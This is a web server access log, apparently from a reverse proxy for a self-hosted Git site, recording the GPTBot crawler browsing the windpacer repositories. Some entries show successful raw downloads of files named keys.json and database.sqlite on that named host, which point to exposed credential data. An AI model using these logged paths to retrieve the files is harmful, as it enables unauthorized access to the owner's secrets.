git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fnotifier.py" [Client 74.7.227.38] [Length 29697] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:15:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fcalculator.py" [Client 74.7.227.38] [Length 23606] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" +[17/Feb/2026:15:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fstorage.py" [Client 74.7.227.38] [Length 22440] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:15:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json?display=source" [Client 74.7.227.38] [Length 11028] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11868] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" +[17/Feb/2026:15:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" +[17/Feb/2026:15:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2findex.html" [Client 74.7.227.38] [Length 67420] [Gzip 10.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:15:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services/geminiService.ts" +[17/Feb/2026:15:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" +[17/Feb/2026:15:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10960] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm" [Client 74.7.227.38] [Length 10567] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm" +[17/Feb/2026:15:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data" [Client 74.7.227.38] [Length 11084] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm" +[17/Feb/2026:15:26:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm" +[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm" +[17/Feb/2026:15:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" +[17/Feb/2026:15:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" +[17/Feb/2026:15:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 14064] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:15:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:15:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9831] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:26:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal" +[17/Feb/2026:15:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs" [Client 74.7.227.38] [Length 11408] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 11097] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 13005] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data" +[17/Feb/2026:15:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data" +[17/Feb/2026:15:26:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data" +[17/Feb/2026:15:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data" +[17/Feb/2026:15:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:15:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 16999] [Gzip 9.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:15:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" +[17/Feb/2026:15:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:15:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 10891] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" +[17/Feb/2026:15:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs" [Client 74.7.227.38] [Length 10612] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:15:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 1426] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10058] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 9821] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/keys.json" [Client 74.7.227.38] [Length 12066] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" +[17/Feb/2026:15:26:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:15:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs" +[17/Feb/2026:15:26:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/logs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/logs" +[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/database.sqlite" +[17/Feb/2026:15:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 15915] [Gzip 10.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:15:26:43 +0000] - 200 200 - GET https 